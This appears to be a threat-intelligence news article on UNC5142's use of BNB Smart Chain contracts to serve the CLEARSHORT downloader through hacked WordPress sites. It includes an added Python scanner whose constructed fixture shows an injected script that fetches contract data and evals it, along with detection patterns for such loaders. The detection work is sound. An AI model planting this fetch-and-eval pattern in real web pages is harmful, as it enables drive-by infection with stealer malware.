Hackers exploit blockchain smart contracts to spread malware via infected WordPress sites

By user, October 16, 2025

A financially motivated attacker, codenamed UNC5142, has been observed exploiting blockchain smart contracts as a way to facilitate the distribution of information stealers such as Atomic (AMOS), Lumma, Rhadamanthys (aka RADTHIEF), and Vidar, targeting both Windows and Apple macOS systems.

“UNC5142 is characterized by the use of ‘EtherHiding,’ a technique used to place and hide compromised WordPress websites and malicious code and data on public blockchains, such as the BNB Smart Chain,” Google Threat Intelligence Group (GTIG) said in a report shared with The Hacker News.

Google said that as of June 2025 it had flagged approximately 14,000 web pages containing injected JavaScript that exhibited UNC5142-related behavior, with the campaign indiscriminately targeting vulnerable WordPress sites. However, the company noted that it has not observed any UNC5142 activity since July 23, 2025, which may indicate a suspension or shift in operations.

EtherHiding was first documented by Guardio Labs in October 2023, in an analysis of an attack that leveraged Binance Smart Chain (BSC) contracts to serve malicious code through infected sites displaying fake browser update alerts.

A key aspect behind the attack chain is a multi-stage JavaScript downloader called CLEARSHORT that enables malware distribution via hacked sites. The first stage is JavaScript malware that is injected into a website to obtain the second stage by interacting with a malicious smart contract stored on the BNB Smart Chain (BSC) blockchain. The first stage malware is added to plugin-related files, theme files, and sometimes directly to the WordPress database.
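As an added example (not code from the GTIG report or this article), below is a small Python heuristic that a WordPress administrator or incident responder could run over plugin files, theme files, or post content to flag a first-stage loader of the kind just described: it scores a snippet for contact with public BNB Smart Chain JSON-RPC endpoints combined with fetch-and-execute behaviour. The sample snippets, the CDN hostname, and the contract address are constructed placeholders, not indicators from the report.

```python
"""Heuristic scanner for EtherHiding-style first-stage loaders (added example).
Scores a snippet for injected JavaScript that reads a BNB Smart Chain contract
over JSON-RPC and executes what it gets back.  All samples are constructed."""
import re
from dataclasses import dataclass, field

# (name, pattern, weight): BSC public RPC hostnames plus generic fetch-and-execute signs.
INDICATORS = [
    ("bsc_rpc_endpoint", re.compile(r"bsc-dataseed\d*\.(?:binance|bnbchain)\.org", re.I), 4),
    ("json_rpc_eth_call", re.compile(r"\beth_call\b"), 3),
    ("web3_library", re.compile(r"\b(?:web3|ethers)(?:\.min)?\.js\b|new\s+Web3\(|ethers\.Contract", re.I), 2),
    ("contract_address", re.compile(r"\b0x[0-9a-fA-F]{40}\b"), 1),
    ("dynamic_eval", re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("), 3),
    ("injected_script_tag", re.compile(r"createElement\(\s*['\"]script['\"]\s*\)"), 2),
    ("payload_decoding", re.compile(r"\batob\s*\(|fromCharCode|hexToUtf8|toUtf8String"), 1),
]

@dataclass
class ScanResult:
    score: int = 0
    hits: list = field(default_factory=list)
    suspicious: bool = False

def scan_snippet(text: str, threshold: int = 7) -> ScanResult:
    """Sum the weights of every indicator present; flag when the sum reaches threshold."""
    result = ScanResult()
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            result.score += weight
            result.hits.append(name)
    result.suspicious = result.score >= threshold
    return result

# Constructed sample of an injected loader: it reads a string stored in a BSC
# contract and evals it (the hostname and address are placeholders, not real IoCs).
INJECTED_SAMPLE = """<script src="https://cdn.example.invalid/web3.min.js"></script>
<script>
const w = new Web3("https://bsc-dataseed1.binance.org/");
const c = new w.eth.Contract(ABI, "0x0123456789abcdef0123456789abcdef01234567");
c.methods.get().call().then(r => eval(w.utils.hexToUtf8(r)));
</script>"""

# Constructed benign sample: a theme script that only injects a stylesheet link.
BENIGN_SAMPLE = """<script>
const l = document.createElement("link"); l.rel = "stylesheet";
l.href = "https://fonts.googleapis.com/css?family=Roboto"; document.head.appendChild(l);
</script>"""
```

A hit on the RPC endpoint alone is worth investigating even below the threshold, since legitimate WordPress themes rarely need to talk to a blockchain node.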

The smart contract is responsible for retrieving the CLEARSHORT landing page from an external server. The landing page employs ClickFix social engineering tactics to trick victims into running malicious commands in the Windows Run dialog (or the Terminal app on macOS), ultimately infecting the system with stealer malware. Landing pages are typically hosted on Cloudflare .dev pages and, as of December 2024, are retrieved in encrypted form.

[Figure: CLEARSHORT infection chain]

On Windows systems, the malicious command executes an HTML Application (HTA) file downloaded from a MediaFire URL. The HTA then drops a PowerShell script that evades defenses, fetches the final encrypted payload from GitHub, MediaFire, or possibly attacker-controlled infrastructure, and runs the stealer directly in memory without writing artifacts to disk.

In attacks targeting macOS in February and April 2025, the attackers used ClickFix decoys to prompt users to run bash commands in the Terminal, which retrieved a shell script. That script then uses the curl command to fetch the Atomic Stealer payload from a remote server.

[Figure: Distribution of UNC5142 final payload over time]

CLEARSHORT is assessed to be a variant of ClearFake, which was the subject of extensive analysis by French cybersecurity firm Sekoia in March 2025. ClearFake is a rogue JavaScript framework deployed on compromised websites that distributes malware through drive-by download techniques. It is known to have been active since July 2023, with its attacks adopting ClickFix around May 2024.

Abusing the blockchain offers the attackers several benefits: the traffic blends in with legitimate Web3 activity, and it makes UNC5142's operations more resilient to detection and takedown efforts.

Google said the attackers' campaigns have evolved significantly over the past year, moving from a single-contract system to a more sophisticated three-smart-contract system starting in November 2024 to increase operational agility, with further improvements observed in early January of this year.

“This new architecture is an adaptation of a legitimate software design principle known as the proxy pattern, which developers use to make contracts upgradable,” the company explained.

“This setup acts as a highly efficient router-logic-storage architecture, where each contract has a specific job. This design allows critical parts of the attack, such as landing page URLs and decryption keys, to be quickly updated without requiring any changes to the compromised website’s JavaScript. As a result, campaigns become more agile and more resistant to takedowns.”

UNC5142 accomplishes this by leveraging the mutable nature of smart contract storage (the contract's code itself cannot be changed once deployed) to change the payload URL, paying a network fee of $0.25 to $1.50 per update.

Further analysis revealed that the attackers were using two different sets of smart contract infrastructure to deliver the stealer malware via the CLEARSHORT downloader. The main infrastructure is said to have been created on November 24, 2024, while the parallel secondary infrastructure was funded on February 18, 2025.

“Main Infrastructure stands out as the core campaign infrastructure, characterized by early creation and a steady stream of updates,” GTIG said. “Secondary infrastructure looks like a parallel, more tactical deployment; it could be established to support specific spikes in campaign activity, test new temptations, or simply build operational resilience.”

“Given the consistent operational tempo over the past year and a half, the large number of compromised websites, and the diversity of distributed malware payloads, as well as frequent updates to the infection chain, we believe UNC5142 has achieved some operational success.”
